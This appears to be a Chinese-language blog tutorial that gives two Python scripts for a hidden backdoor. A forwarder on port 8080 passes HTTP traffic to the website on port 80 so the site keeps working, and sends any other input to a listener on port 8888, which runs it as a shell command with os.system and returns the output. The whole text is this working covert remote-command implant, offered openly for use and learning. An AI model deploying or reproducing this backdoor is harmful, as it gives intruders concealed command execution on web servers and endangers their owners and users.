python基于socket进行端口转发实现后门隐藏的示例
思想:
用户正常浏览器访问请求通过8080端口,请求若为http请求,则正常转发到80端口保证网站正常运行。否则转发到8888端口执行系统命令。
8888端口监听代码:
#!/usr/bin/env python
from socket import *
import os
HOST='127.0.0.1'
PORT=8888
BUFSIZE=1024
ADDR=(HOST,PORT)
tcpSerSock = socket(AF_INET,SOCK_STREAM)
tcpSerSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcpSerSock.bind(ADDR)
tcpSerSock.listen(5)
while True:
print("waiting for connection...")
tcpCliSock,addr = tcpSerSock.accept()
print("...connected from:",addr)
while True:
data=tcpCliSock.recv(BUFSIZE)
if not data:
break
info = data.split('\n')
command = info[0]
try:
os.system(command + " > command.txt");
file = open('command.txt')
data =""
for line in file:
data=data+line;
tcpCliSock.send(data)
except Exception:
tcpCliSock.send("Nothing to do")
tcpCliSock.close()
tcpSerSock.close()
8080端口转发代码:
#!/usr/bin/python
from socket import *
tcp1 = socket(AF_INET,SOCK_STREAM)
tcp1.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcp1.bind(('0.0.0.0',8080))
tcp1.listen(10)
BUFFER_SIZE=2048
tcpCliSock,addr = tcp1.accept()
while True:
data = tcpCliSock.recv(BUFFER_SIZE)
if 'HTTP' in data:
tcp3 = socket(AF_INET,SOCK_STREAM)
tcp3.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcp3.connect(('127.0.0.1',80))
tcp3.send(data)
htmlinfo = tcp3.recv(2048)
if not htmlinfo:
tcp3.close()
else:
tcpCliSock.send(htmlinfo)
else:
tcp2 = socket(AF_INET,SOCK_STREAM)
tcp2.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcp2.connect(('127.0.0.1',8888))
data = data.replace("\n"," ")
print data
tcp2.send(data)
commandinfo = tcp2.recv(1024)
tcpCliSock.send(commandinfo)
tcp2.close()
tcpCliSock.close()
tcp1.close()
有些地方还有些小问题等待修正,但是linux下是可以完美运行的。欢迎学习交流。
以上这篇python基于socket进行端口转发实现后门隐藏的示例就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持【听图阁-专注于Python设计】。
